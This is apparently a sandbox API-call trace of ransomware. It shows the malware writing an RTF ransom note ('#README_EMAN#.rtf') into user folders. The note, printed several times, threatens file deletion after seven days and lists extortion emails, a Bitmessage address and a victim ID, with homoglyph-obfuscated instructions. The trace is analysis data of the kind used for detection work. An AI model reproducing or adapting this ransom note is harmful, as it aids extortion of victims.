CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.833] WriteFile (in: hFile=0x284, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.834] CloseHandle (hObject=0x284) returned 1 [0284.834] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\#readme_eman#.rtf")) returned 0xffffffff [0284.834] GetLastError () returned 0x2 [0284.834] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.836] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 